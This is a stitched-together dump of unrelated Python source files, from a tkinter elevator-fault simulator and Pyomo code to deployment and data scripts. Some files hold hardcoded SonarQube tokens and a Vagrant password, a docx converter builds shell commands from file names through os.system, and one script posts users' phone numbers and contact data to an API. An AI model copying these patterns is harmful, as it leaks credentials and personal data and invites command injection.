self.button3_back.configure(style="chosen.TButton")
elif etage == 4 :
self.button4_back.configure(style="chosen.TButton")
elif etage == 5 :
self.button5_back.configure(style="chosen.TButton")
elif statut == 1 :
if etage == 1:
self.button1_front.configure(style="chosen.TButton")
elif etage == 2 :
self.button2_front.configure(style="chosen.TButton")
elif etage == 3 :
self.button3_front.configure(style="chosen.TButton")
elif etage == 3 :
self.button3_front.configure(style="chosen.TButton")
elif etage == 4 :
self.button4_front.configure(style="chosen.TButton")
elif etage == 5 :
self.button5_front.configure(style="chosen.TButton")
def Door_To_Red(self,etage,statut):
if statut == 0 :
if etage == 1:
self.button1_back.configure(style="unchosen.TButton")
elif etage == 2 :
self.button2_back.configure(style="unchosen.TButton")
elif etage == 3 :
self.button3_back.configure(style="unchosen.TButton")
elif etage == 3 :
self.button3_back.configure(style="unchosen.TButton")
elif etage == 4 :
self.button4_back.configure(style="unchosen.TButton")
elif etage == 5 :
self.button5_back.configure(style="unchosen.TButton")
elif statut == 1 :
if etage == 1:
self.button1_front.configure(style="unchosen.TButton")
elif etage == 2 :
self.button2_front.configure(style="unchosen.TButton")
elif etage == 3 :
self.button3_front.configure(style="unchosen.TButton")
elif etage == 3 :
self.button3_front.configure(style="unchosen.TButton")
elif etage == 4 :
self.button4_front.configure(style="unchosen.TButton")
elif etage == 5 :
self.button5_front.configure(style="unchosen.TButton")
def check_Changes(self):
for i in range (5):
if i==0 :
if (self.button1_back.configure().get('style').__contains__("unchosen.TButton")) and self.button1_front.configure().get('style').__contains__("unchosen.TButton"):
self.button1_back.configure(style="blank.TButton")
self.button1_front.configure(style="blank.TButton")
elif (self.button1_back.configure().get('style').__contains__("chosen.TButton")) and self.button1_front.configure().get('style').__contains__("chosen.TButton"):
self.button1_back.configure(style="blank.TButton")
self.button1_front.configure(style="blank.TButton")
elif i==1 :
if (self.button2_back.configure().get('style').__contains__("unchosen.TButton")) and self.button2_front.configure().get('style').__contains__("unchosen.TButton"):
self.button2_back.configure(style="blank.TButton")
self.button2_front.configure(style="blank.TButton")
elif (self.button2_back.configure().get('style').__contains__("chosen.TButton")) and self.button2_front.configure().get('style').__contains__("chosen.TButton"):
self.button2_back.configure(style="blank.TButton")
self.button2_front.configure(style="blank.TButton")
elif i==2 :
if (self.button3_back.configure().get('style').__contains__("unchosen.TButton")) and self.button3_front.configure().get('style').__contains__("unchosen.TButton"):
self.button3_back.configure(style="blank.TButton")
self.button3_front.configure(style="blank.TButton")
elif (self.button3_back.configure().get('style').__contains__("chosen.TButton")) and self.button3_front.configure().get('style').__contains__("chosen.TButton"):
self.button3_back.configure(style="blank.TButton")
self.button3_front.configure(style="blank.TButton")
elif i==3 :
if (self.button4_back.configure().get('style').__contains__("unchosen.TButton")) and self.button4_front.configure().get('style').__contains__("unchosen.TButton"):
self.button4_back.configure(style="blank.TButton")
self.button4_front.configure(style="blank.TButton")
elif (self.button4_back.configure().get('style').__contains__("chosen.TButton")) and self.button4_front.configure().get('style').__contains__("chosen.TButton"):
self.button4_back.configure(style="blank.TButton")
self.button4_front.configure(style="blank.TButton")
elif i==4 :
if (self.button5_back.configure().get('style').__contains__("unchosen.TButton")) and self.button5_front.configure().get('style').__contains__("unchosen.TButton"):
self.button5_back.configure(style="blank.TButton")
self.button5_front.configure(style="blank.TButton")
elif (self.button5_back.configure().get('style').__contains__("chosen.TButton")) and self.button5_front.configure().get('style').__contains__("chosen.TButton"):
self.button5_back.configure(style="blank.TButton")
self.button5_front.configure(style="blank.TButton")
class Defaillance_Louis_Eloise_Jules():
def __init__(self, master,Elevator,descente_impossible):
self.master = master
self.frame = tk.Frame(self.master)
self.frame.grid_rowconfigure(1, weight=1)
self.frame.grid_columnconfigure(2, weight=1)
self.master.geometry('600x300')
self.Elevator = Elevator
self.descente_impossible=descente_impossible
self.master.title('Defaillances')
self.frame_Louis = tk.Frame(self.frame)
self.display_Louis = tk.Label(self.frame_Louis, text=' Défaillances portes ',background ='light grey', height =2,font=("Arial",12,'bold'))
self.display_Louis.pack(fill='x')
self.button1 = ttk.Button(self.frame_Louis, text='fermer les portes manuellement', command=self.fPortes)
self.button1.pack(fill='x')
self.button2 = ttk.Button(self.frame_Louis, text='ouvrir les portes manuellement', command=self.ouvPortes)
self.button2.pack(fill='x')
self.button3 = ttk.Button(self.frame_Louis, text='ouvrir un peu les portes manuellement', command=self.ouvUnPeuPortes)
self.button3.pack(fill='x')
self.button4 = ttk.Button(self.frame_Louis, text='bloquer les portes', command=self.bloquerPortes)
self.button4.configure(style="unchosen_new.TButton")
self.button4.pack(fill='x')
self.button5 = ttk.Button(self.frame_Louis, text='debloquer les portes manuellement', command=self.debloquerPortes)
self.button5.pack(fill='x')
self.button6 = ttk.Button(self.frame_Louis, text='l\'ascenceur bouge avec les portes ouvertes',command=self.bougePortesOuvertes)
self.button6.configure(style="unchosen_new.TButton")
self.button6.pack()
self.frame_Louis.configure(highlightbackground="white", highlightthickness=2)
self.frame_Louis.grid(row=0,column=1, sticky="ne")
self.frame_Eloise_Jules = tk.Frame(self.frame)
self.frame_Eloise = tk.Frame(self.frame_Eloise_Jules)
self.frame_Eloise.configure(highlightbackground="white", highlightthickness=2)
self.display_Eloise = tk.Label(self.frame_Eloise, text=' Défaillances étages ',background ='light grey', height =2,font=("Arial",12,'bold'))
self.display_Eloise.pack(fill='x')
self.button7 = ttk.Button(self.frame_Eloise, text='activer / désactiver la défaillance mauvais étage',command=self.def_etage)
self.button7.configure(style="unchosen_new.TButton")
self.button7.pack(fill='x')
self.frame_Eloise.pack()
self.frame_Jules = tk.Frame(self.frame_Eloise_Jules)
self.frame_Jules.configure(highlightbackground="white", highlightthickness=2)
self.display_Jules = tk.Label(self.frame_Jules, text=' Défaillances mouvement ', background='light grey',height=2, font=("Arial", 12, 'bold'))
self.display_Jules.pack(fill='x')
self.buttonDesactivation = ttk.Button(self.frame_Jules, text='Désactiver descente',command=self.desc_desactivate)
self.buttonDesactivation.pack(fill='x')
self.buttonActivation = ttk.Button(self.frame_Jules, text='Activer descente', command=self.desc_activate)
self.buttonActivation.pack(fill='x')
self.frame_Jules.pack(fill='x')
self.frame_Eloise_Jules.grid(row=0, column=0, sticky='nw')
self.frame.pack()
self.desc_activate()
def desc_desactivate(self):
descente_impossible.activate()
Double_porte_Elio.button_color(self,self.buttonDesactivation,self.buttonActivation)
def desc_activate(self):
descente_impossible.desactivate()
Double_porte_Elio.button_color(self,self.buttonActivation,self.buttonDesactivation)
def def_etage(self):
global mauvaisetage
if mauvaisetage == False:
mauvaisetage = True
self.button7.configure(style="chosen_new.TButton")
else:
mauvaisetage = False
self.button7.configure(style="unchosen_new.TButton")
def fPortes(self):
global portes_ouvertes, curMouvement, CurTempo
portes_ouvertes = 0
CurTempo = 0
if curMouvement=='p':
curMouvement='0'
statut = portes[curEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
Elevator.Door_To_Red(self.Elevator,curEtage, statut)
def ouvPortes(self):
global portes_ouvertes, curMouvement, CurTempo
portes_ouvertes = 1
CurTempo=0
if curMouvement!='p':
curMouvement='p'
statut = portes[curEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
Elevator.Door_To_Green(self.Elevator,curEtage, statut)
def ouvUnPeuPortes(self):
global portes_ouvertes, curMouvement, CurTempo, PORTES_UN_PEU_OUVERTES
CurTempo = 0
if curMouvement != 'p':
curMouvement = 'p'
statut = portes[curEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
Elevator.Door_To_Green(self.Elevator, curEtage, statut)
portes_ouvertes = PORTES_UN_PEU_OUVERTES
print("portes ouvertes à " + str(PORTES_UN_PEU_OUVERTES * 100) + "%")
def bloquerPortes(self):
global portes_bloquees
portes_bloquees = True
self.button4.configure(style="chosen_new.TButton")
def debloquerPortes(self):
global portes_bloquees
portes_bloquees = False
self.button4.configure(style="unchosen_new.TButton")
def bougePortesOuvertes(self):
global bouge_portes_ouvertes
if bouge_portes_ouvertes==False :
bouge_portes_ouvertes = True
self.button6.configure(style="chosen_new.TButton")
else :
bouge_portes_ouvertes = False
self.button6.configure(style="unchosen_new.TButton")
class Double_porte_Elio :
def __init__(self, master):
self.master = master
self.frame = tk.Frame(self.master)
self.portes = [0,0,0,0,0] # 0 -> porte de gauche programmée, sinon 1 -> porte de droite. (état initial), chaque indice représente un étage.
global portes
self.master.geometry('215x260')
portes = self.portes
self.master.title('Defaillances double portes Elio')
self.display = tk.Label(self.frame, text='Choose on which side the door is')
self.display.pack()
plus = ttk.Style()
plus.map("chosen_new.TButton", foreground=[('pressed', 'green'), ('active', 'silver'),('!disabled','green')],background=[('pressed', '!disabled', 'green')] )
plus.map("unchosen_new.TButton", foreground=[('pressed', 'firebrick'), ('active', 'silver'),('!disabled','firebrick')],background=[('pressed', '!disabled', 'green')])
plus.configure("TButton", padding=(0, 5, 0, 5))
plus.configure("chosen.TButton",foreground='green')
plus.configure("unchosen.TButton", foreground='firebrick')
plus.configure("blank.TButton", foreground='black')
# ----------------------(Buttons 5)---------------------- #
self.frame5 = tk.Frame(self.frame)
self.button5L = ttk.Button(self.frame5, text='Left')
self.button5R = ttk.Button(self.frame5, text='Right')
self.button5R.configure(command=self.porte_R5)
self.button5L.configure(command=self.porte_L5)
self.display_5 = tk.Label(self.frame5, text=' #_5_# ')
self.button5L.pack(side=tk.LEFT)
self.button5R.pack(side=tk.RIGHT)
self.display_5.pack(side=tk.RIGHT)
self.frame5.pack(expand=True)
# ----------------------(Buttons 4)---------------------- #
self.frame4 = tk.Frame(self.frame)
self.button4L = ttk.Button(self.frame4, text='Left')
self.button4R = ttk.Button(self.frame4, text='Right')
self.button4R.configure(command=self.porte_R4)
self.button4L.configure(command=self.porte_L4)
self.display_4 = tk.Label(self.frame4, text=' #_4_# ')
self.button4L.pack(side=tk.LEFT)
self.button4R.pack(side=tk.RIGHT)
self.display_4.pack(side=tk.RIGHT)
self.frame4.pack(expand=True)
# ----------------------(Buttons 3)---------------------- #
self.frame3 = tk.Frame(self.frame)
self.button3L = ttk.Button(self.frame3, text='Left')
self.button3R = ttk.Button(self.frame3, text='Right')
self.button3R.configure(command=self.porte_R3)
self.button3L.configure(command=self.porte_L3)
self.display_3 = tk.Label(self.frame3, text=' #_3_# ')
self.button3L.pack(side=tk.LEFT)
self.button3R.pack(side=tk.RIGHT)
self.display_3.pack(side=tk.RIGHT)
self.frame3.pack(expand=True)
# ----------------------(Buttons 2)---------------------- #
self.frame2 = tk.Frame(self.frame)
self.button2L = ttk.Button(self.frame2, text='Left')
self.button2R = ttk.Button(self.frame2, text='Right')
self.button2R.configure(command=self.porte_R2)
self.button2L.configure(command=self.porte_L2)
self.display_2 = tk.Label(self.frame2, text=' #_2_# ')
self.button2L.pack(side=tk.LEFT)
self.button2R.pack(side=tk.RIGHT)
self.display_2.pack(side=tk.RIGHT)
self.frame2.pack(expand=True)
# ----------------------(Buttons 1)---------------------- #
self.frame1 = tk.Frame(self.frame)
self.button1L = ttk.Button(self.frame1, text='Left')
self.button1R = ttk.Button(self.frame1, text='Right')
self.button1R.configure(command=self.porte_R1)
self.button1L.configure(command=self.porte_L1)
self.display_1 = tk.Label(self.frame1, text=' #_1_# ')
self.button1L.pack(side=tk.LEFT)
self.button1R.pack(side=tk.RIGHT)
self.display_1.pack(side=tk.RIGHT)
self.frame1.pack(expand=True)
self.button_mauvaisePorte = ttk.Button(self.frame, text='l\'ascenceur n\'ouvre pas la bonne porte',command=self.mauvaisePorte)
self.button_mauvaisePorte.pack(fill='x')
self.button_bonnePorte = ttk.Button(self.frame, text='l\'ascenceur ouvre la bonne porte',command=self.bonnePorte)
self.button_bonnePorte.pack(fill='x')
self.porte_L1()
self.porte_L2()
self.porte_L3()
self.porte_L4()
self.porte_L5()
self.bonnePorte()
self.frame.pack()
def mauvaisePorte(self):
global mauvaisePorte
mauvaisePorte = True
self.button_color(self.button_mauvaisePorte,self.button_bonnePorte)
def bonnePorte(self):
global mauvaisePorte
mauvaisePorte = False
self.button_color(self.button_bonnePorte,self.button_mauvaisePorte)
def button_color(self,buttonv,buttonuv):
buttonv.configure(style="chosen_new.TButton")
buttonuv.configure(style='unchosen_new.TButton')
def porte_R1(self):
self.portes[0]=1
self.button_color(self.button1R,self.button1L)
def porte_L1(self):
self.portes[0]=0
self.button_color(self.button1L,self.button1R)
def porte_R2(self):
self.portes[1]=1
self.button_color(self.button2R,self.button2L)
def porte_L2(self):
self.portes[1]=0
self.button_color(self.button2L,self.button2R)
def porte_R3(self):
self.portes[2]=1
self.button_color(self.button3R,self.button3L)
def porte_L3(self):
self.portes[2]=0
self.button_color(self.button3L,self.button3R)
def porte_R4(self):
self.portes[3]=1
self.button_color(self.button4R,self.button4L)
def porte_L4(self):
self.portes[3]=0
self.button_color(self.button4L,self.button4R)
def porte_R5(self):
self.portes[4]=1
self.button_color(self.button5R,self.button5L)
def porte_L5(self):
self.portes[4]=0
self.button_color(self.button5L,self.button5R)
def main():
root = tk.Tk()
app = Lift(root)
root.protocol("WM_DELETE_WINDOW", app.sortir)
Cron = MyTimer(0.02, app.move)
Cron.start()
root.mainloop()
if __name__ == '__main__':
main()
|
991,470 | e80e86bbcb76b248356d1cd2dc70949bdc0b1f92 | #!/usr/bin/python3
import os
import zipfile, tempfile
import click
import shutil
@click.command()
@click.argument('input', nargs=1, type=click.Path(exists=True, file_okay=True, dir_okay=False))
def main(input):
"""A small script that converts docx files to lyx using pandoc and tex2lyx.
A folder with the name of the input file is created, with a subfolder `media`,
holding all images etc. from the docx file. The main folder will also contain
a copy of the original file and the final lyx file.
"""
path = os.path.abspath(input)
name = os.path.splitext(os.path.basename(path))[0]
p = os.path.join(os.getcwd(),name)
i = 1
p1 = p
while os.path.exists(p1):
p1 = "{p}-{i}".format(p=p,i=i)
i += 1
p = p1
os.mkdir(p1)
os.mkdir(os.path.join(p1,"media"))
with zipfile.ZipFile(path) as zf:
for file in zf.namelist():
# Path traversal defense copied from
# http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789
words = file.split('/')
dest = os.path.join(p1, "media")
if words[0] == "word" and words[1] == "media":
for word in words[2:]:
while True:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if not drive:
break
if word in (os.curdir, os.pardir, ''):
continue
dest = os.path.join(dest, word)
click.echo("{} -> {}".format(file, dest))
of = open(dest, 'wb')
of.write(zf.read(file))
of.close()
newdoc = os.path.join(p1, os.path.basename(path))
lyxfile = os.path.join(p1, name + ".lyx")
texfile = os.path.join(p1, name + ".tex")
shutil.copyfile(path, newdoc)
os.system("pandoc -s -f docx -t latex -o '{of}' '{i}'".format(of=texfile, i=newdoc))
os.system("tex2lyx '{i}' '{o}'".format(i=texfile, o=lyxfile))
os.remove(texfile)
os.system("convertwmf {dir}".format(dir=os.path.join(p1, "media")))
click.echo(lyxfile)
if __name__ == '__main__':
main()
|
991,471 | 6e67635ac77004e464ecbb494107ca87018c3d11 | from fabric.api import *
env.hosts = ['192.168.33.10']
env.user = 'vagrant'
env.password = 'vagrant'
def package():
local('python setup.py sdist --format=gztar', capture=False)
def deploy():
dist = local('python setup.py --fullname', capture=True).strip()
put('dist/%s.tar.gz' % dist, '/tmp/myapp.tar.gz')
run('mkdir /tmp/myapp')
with cd('/tmp/myapp'):
run('tar xzf /tmp/myapp.tar.gz')
with cd('/tmp/myapp/%s' % dist):
run('/home/vagrant/test/bin/python setup.py install')
run('rm -rf /tmp/myapp /tmp/myapp.tar.gz')
# run('touch /var/www/myapp.wsgi') |
991,472 | 030213bef6a4611876018682579ab6b8af2f6aa1 | # -*- coding: utf-8 -*-
from zope.i18nmessageid import MessageFactory as ZMessageFactory
import warnings
_ = ZMessageFactory('plone')
def MessageFactory(*args, **kwargs):
# BBB Remove in Plone 5.2
warnings.warn(
"Name clash, now use '_' as usal. Will be removed in Plone 5.2",
DeprecationWarning)
return _(*args, **kwargs)
|
991,473 | 8a8f29658e6db4b0418dcf1a06d7ea5656d49ce9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import itertools
import time
#mylist = list(itertools.product([0,1,2,3,4,5,6,7,8,9,],repeat=5))
passwd = ("".join(x) for x in itertools.product("0123456789",repeat=3))
#print(mylist)
#print(len(mylist))
while True:
try:
time.sleep(0.5)
str = next(passwd)
print(str)
except StopIteration as e:
break
|
991,474 | ed3d3cebe7108b2054f8f2806767ca6152eac47b | #Author : Rohit
#license to : ABB Seden
'''56 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332
57 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=.
58 vim sonar-project.properties
59 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=.
60 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=. -Dsonar.projectKey=devopsschool -Dsonar.source=.
'''
import os
print("hello word")
print('''Twinkle, twinkle, little star
How I wonder what you are
Up above the world so high
Like a diamond in the sky
Twinkle, twinkle little star
How I wonder what you are''')
|
991,475 | 57f88afe5d6918be27810c815b280682c77086b2 | # -*- coding: utf-8 -*-
"""
actions.py
:copyright: © 2019 by the EAB Tech team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import shutil
import subprocess
from juniper.constants import DEFAULT_OUT_DIR
from juniper.io import (get_artifact, write_tmp_file, get_artifact_path)
def build_artifacts(logger, ctx):
"""
Creates a .zip file for each one of the serverless functions defined in the given
manifest definitions file. Each function must include a name, and the set of directories
to be included in the artifact. As part of the packaging, if the given function
has a definition of a requirements file, all the dependencies in that file will be
included in the artifact.
:param logger: The logger instance.
:param ctx: The definition of the functions and global parameters as defined in the input file.
"""
compose_fn = build_compose(logger, ctx)
logger.debug(f'docker-compose.yml - {compose_fn}')
try:
# Must copy the bin directory to the client's folder structure. This directory
# will be promtly cleaned up after the artifacts are built.
os.makedirs('./.juni/bin', exist_ok=True)
shutil.copy(get_artifact_path('package.sh'), './.juni/bin/')
# Use docker as a way to pip install dependencies, and copy the business logic
# specified in the function definitions.
subprocess.run(["docker-compose", "-f", compose_fn, '--project-directory', '.', 'down'])
subprocess.run(["docker-compose", "-f", compose_fn, '--project-directory', '.', 'up'])
finally:
shutil.rmtree('./.juni', ignore_errors=True)
def build_compose(logger, ctx):
"""
Builds a docker-compose file with the lambda functions defined in the ctx.
The definition of the lambda functions includes the name of the function as
well as the set of dependencies to include in the packaging.
:param logger: The logger instance.
:param ctx: The yaml file that contains the info of the functions to package.
"""
compose = '\n'.join([_get_compose_header(ctx), _get_compose_sections(ctx)])
# Returns the name of the temp file that has the docker-compose definition.
return write_tmp_file(compose)
def _get_compose_header(ctx):
"""
Returns the static docker-compose header. Used when building the compose file.
"""
return get_artifact('compose_header.yml')
def _get_compose_sections(ctx):
"""
Build the service entry for each one of the functions in the given context.
Each docker-compose entry will depend on the same image and it's just a static
definition that gets built from a template. The template is in the artifacts
folder.
"""
template = get_artifact('compose_entry.yml')
sections = [
_build_compose_section(ctx, template, name, definition)
for name, definition in ctx.get('functions', {}).items()
]
return '\n\n'.join(sections)
def _build_compose_section(ctx, template, name, sls_function):
"""
Builds a single docker-compose entry for a given serverless function. Includes
the volumes mapping as well as the basic info of the function. Also, if the
function has a given requirements file definition, the file will be included
as part of the volumes mapping.
:param template: The static template that defines the docker compose entry for the function
:param name: The name of the serverless function
:param sls_function: The actual object with the parameters needed to stamp the template
"""
def get_vol(include):
name = include[include.rindex('/') + 1:]
return f' - {include}:/var/task/common/{name}'
output_dir = ctx.get('package', {}).get('output', DEFAULT_OUT_DIR)
volumes = [
f' - {output_dir}:/var/task/dist',
' - ./.juni/bin:/var/task/bin',
] + [
get_vol(include)
for include in sls_function.get('include', [])
]
reqs_path = sls_function.get('requirements')
if reqs_path:
volumes.append(f' - {reqs_path}:/var/task/common/requirements.txt')
return template.format(name=name, volumes='\n'.join(volumes))
|
991,476 | ef86dcb590d54e95f8d6de436dde0575197447fd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by wxk on 17-10-15 上午12:23
# Email="wangxk1991@gamil.com"
# Desc: 短信通知类
from src.Notify import Notify
class Sms(Notify):
pass |
991,477 | 3a69f68ba53cc795563304841dcf8b8049c15467 | # ___________________________________________________________________________
#
# Pyomo: Python Optimization Modeling Objects
# Copyright (c) 2008-2022
# National Technology and Engineering Solutions of Sandia, LLC
# Under the terms of Contract DE-NA0003525 with National Technology and
# Engineering Solutions of Sandia, LLC, the U.S. Government retains certain
# rights in this software.
# This software is distributed under the 3-clause BSD License.
# ___________________________________________________________________________
from pyomo.common.deprecation import deprecated
from pyomo.contrib.incidence_analysis.matching import maximum_matching
from pyomo.contrib.incidence_analysis.common.dulmage_mendelsohn import (
# TODO: The fact that we import this function here suggests it should be
# promoted.
_get_projected_digraph,
)
from pyomo.common.dependencies import networkx as nx
def _get_scc_dag_of_projection(graph, top_nodes, matching):
"""Return the DAG of strongly connected components of a bipartite graph,
projected with respect to a perfect matching
This data structure can be used, for instance, to identify the minimal
subsystem of constraints and variables necessary to solve a given variable
or constraint.
"""
nxc = nx.algorithms.components
# _get_projected_digraph treats matched edges as "in-edges", so we
# reverse the direction of edges here.
dg = _get_projected_digraph(graph, matching, top_nodes).reverse()
scc_list = list(nxc.strongly_connected_components(dg))
n_scc = len(scc_list)
node_scc_map = {n: idx for idx, scc in enumerate(scc_list) for n in scc}
# Now we need to put the SCCs in the right order. We do this by performing
# a topological sort on the DAG of SCCs.
dag = nx.DiGraph()
dag.add_nodes_from(range(n_scc))
for n in dg.nodes:
source_scc = node_scc_map[n]
for neighbor in dg[n]:
target_scc = node_scc_map[neighbor]
if target_scc != source_scc:
dag.add_edge(source_scc, target_scc)
# Note that the matching is required to fully interpret scc_list (as it
# only contains the "top nodes")
return scc_list, dag
def get_scc_of_projection(graph, top_nodes, matching=None):
"""Return the topologically ordered strongly connected components of a
bipartite graph, projected with respect to a perfect matching
The provided undirected bipartite graph is projected into a directed graph
on the set of "top nodes" by treating "matched edges" as out-edges and
"unmatched edges" as in-edges. Then the strongly connected components of
the directed graph are computed. These strongly connected components are
unique, regardless of the choice of perfect matching. The strongly connected
components form a directed acyclic graph, and are returned in a topological
order. The order is unique, as ambiguities are resolved "lexicographically".
The "direction" of the projection (where matched edges are out-edges)
leads to a block *lower* triangular permutation when the top nodes
correspond to *rows* in the bipartite graph of a matrix.
Parameters
----------
graph: NetworkX Graph
A bipartite graph
top_nodes: list
One of the bipartite sets in the graph
matching: dict
Maps each node in ``top_nodes`` to its matched node
Returns
-------
list of lists
The outer list is a list of strongly connected components. Each
strongly connected component is a list of tuples of matched nodes.
The first node is a "top node", and the second is an "other node".
"""
nxb = nx.algorithms.bipartite
nxd = nx.algorithms.dag
if not nxb.is_bipartite(graph):
raise RuntimeError("Provided graph is not bipartite.")
M = len(top_nodes)
N = len(graph.nodes) - M
if M != N:
raise RuntimeError(
"get_scc_of_projection does not support bipartite graphs with"
" bipartite sets of different cardinalities. Got sizes %s and"
" %s." % (M, N)
)
if matching is None:
# This matching maps top nodes to "other nodes" *and* other nodes
# back to top nodes.
matching = nxb.maximum_matching(graph, top_nodes=top_nodes)
if len(matching) != 2 * M:
raise RuntimeError(
"get_scc_of_projection does not support bipartite graphs without"
" a perfect matching. Got a graph with %s nodes per bipartite set"
" and a matching of cardinality %s." % (M, (len(matching) / 2))
)
scc_list, dag = _get_scc_dag_of_projection(graph, top_nodes, matching)
scc_order = list(nxd.lexicographical_topological_sort(dag))
# The "natural" return type, here, is a list of lists. Each inner list
# is an SCC, and contains tuples of nodes. The "top node", and its matched
# "bottom node".
ordered_node_subsets = [
sorted([(i, matching[i]) for i in scc_list[scc_idx]]) for scc_idx in scc_order
]
return ordered_node_subsets
def block_triangularize(matrix, matching=None):
"""Compute ordered partitions of the matrix's rows and columns that
permute the matrix to block lower triangular form
Subsets in the partition correspond to diagonal blocks in the block
triangularization. The order is topological, with ties broken
"lexicographically".
Parameters
----------
matrix: ``scipy.sparse.coo_matrix``
Matrix whose rows and columns will be permuted
matching: ``dict``
A perfect matching. Maps rows to columns *and* columns back to rows.
Returns
-------
row_partition: list of lists
A partition of rows. The inner lists hold integer row coordinates.
col_partition: list of lists
A partition of columns. The inner lists hold integer column coordinates.
.. note::
**Breaking change in Pyomo 6.5.0**
The pre-6.5.0 ``block_triangularize`` function returned maps from
each row or column to the index of its block in a block
lower triangularization as the original intent of this function
was to identify when coordinates do or don't share a diagonal block
in this partition. Since then, the dominant use case of
``block_triangularize`` has been to partition variables and
constraints into these blocks and inspect or solve each block
individually. A natural return type for this functionality is the
ordered partition of rows and columns, as lists of lists.
This functionality was previously available via the
``get_diagonal_blocks`` method, which was confusing as it did not
capture that the partition was the diagonal of a block
*triangularization* (as opposed to diagonalization). The pre-6.5.0
functionality of ``block_triangularize`` is still available via the
``map_coords_to_block_triangular_indices`` function.
"""
nxb = nx.algorithms.bipartite
nxc = nx.algorithms.components
nxd = nx.algorithms.dag
from_biadjacency_matrix = nxb.matrix.from_biadjacency_matrix
M, N = matrix.shape
if M != N:
raise ValueError(
"block_triangularize does not currently support non-square"
" matrices. Got matrix with shape %s." % ((M, N),)
)
graph = from_biadjacency_matrix(matrix)
row_nodes = list(range(M))
sccs = get_scc_of_projection(graph, row_nodes, matching=matching)
row_partition = [[i for i, j in scc] for scc in sccs]
col_partition = [[j - M for i, j in scc] for scc in sccs]
return row_partition, col_partition
def map_coords_to_block_triangular_indices(matrix, matching=None):
row_blocks, col_blocks = block_triangularize(matrix, matching=matching)
row_idx_map = {r: idx for idx, rblock in enumerate(row_blocks) for r in rblock}
col_idx_map = {c: idx for idx, cblock in enumerate(col_blocks) for c in cblock}
return row_idx_map, col_idx_map
@deprecated(
msg=(
"``get_blocks_from_maps`` is deprecated. This functionality has been"
" incorporated into ``block_triangularize``."
),
version="6.5.0",
)
def get_blocks_from_maps(row_block_map, col_block_map):
blocks = set(row_block_map.values())
assert blocks == set(col_block_map.values())
n_blocks = len(blocks)
block_rows = [[] for _ in range(n_blocks)]
block_cols = [[] for _ in range(n_blocks)]
for r, b in row_block_map.items():
block_rows[b].append(r)
for c, b in col_block_map.items():
block_cols[b].append(c)
return block_rows, block_cols
@deprecated(
msg=(
"``get_diagonal_blocks`` has been deprecated. Please use"
" ``block_triangularize`` instead."
),
version="6.5.0",
)
def get_diagonal_blocks(matrix, matching=None):
return block_triangularize(matrix, matching=matching)
|
991,478 | 348ae5edf29acf1293ee9ea5e00d26dcfa4b6c61 | # Generated by Django 3.1.6 on 2021-06-03 18:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('banner', '0002_auto_20210603_0815'),
]
operations = [
migrations.CreateModel(
name='BannerSeen',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('address', models.CharField(db_index=True, max_length=50)),
('datetime', models.DateTimeField(auto_now_add=True)),
('banner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ips', to='banner.banner')),
],
),
]
|
991,479 | 49a3ae6630dcb9d34e9d86bc2469ba1ed9b582f5 | from pymongo import MongoClient
from requests import post
client = MongoClient(API_mongoDB) #数据库地址
db = client['chatLog']
users = db['usercontacts']
for user in users.find(): # 遍历usercontacts文档,每次输出一个用户
userPhone = user['userPhone'] #提取用户手机号
userContacts = user['userContacts'] #提取userContacts中的信息,然后解析
contactCity = []
try:
for i in range(len(userContacts)): # 遍历userContacts中全部的值
if 'contactCity' in userContacts[i].keys(): # 判断userContacts[x]中是否有'contactCity'键
x = userContacts[i]['contactCity']
if x != '': # 去除''的情况
contactCity.append(x)
else:
pass
else:
pass
except:
pass
countList = []
countStr = ''
countCity = set(contactCity) # 统计城市的数量,并构造适合的响应格式
for i in countCity:
countList.append("%s=%d" % (i, contactCity.count(i))) # 构造 城市=数量 的列表
countStr = '|'.join(countList)
d = {
'mobile': userPhone,
'list': countStr
}
url = API_City #城市数量统计的接口
r = post(url,data=d)
print(userPhone, ':', r.content)
|
991,480 | 3bda0448e95d1b18a6920df6d75e34759192ff8e |
abbreviations_map = {
'aca': [''],
'asme': ['american society of mechanical engineers'],
'ackerman union': ['au', 'ackerman'],
'afrikan student union': ['asu'],
'alpha gamma omega ucla': ['ago'],
'alpha kappa psi - ucla alpha upsilon chapter': ['akp'],
'alpha tau delta - gamma chapter': ['atd'],
'american indian studies center library': ['aiscl', 'aisc'],
'anderson school of management': ['anderson'],
'architecture & urban design': ['aud'],
'ashe student health center': ['ashe', 'ashe center'],
'asian american studies center library': ['aascl', 'aasc'],
'asian pacific coalition': ['apc'],
'bj\'s restaurant and brewhouse': ['bj'],
'boelter hall': ['bh'],
'bplate dining hall': ['bplate'],
'brain research institute': ['bri'],
'breathe los angeles at ucla': ['breathe la', 'breath la'],
'bruin spacecraft group': ['bruinspace', 'bruin space', 'bsg'],
'cafe 1919': ['1919'],
'coco fresh tea & juice westwood': ['coco'],
'creative labs': ['cl'],
'delta sigma pi': ['dsp'],
'design media arts': ['desma'],
'doris stein eye research center': ['dserc'],
'east asian library': ['eal'],
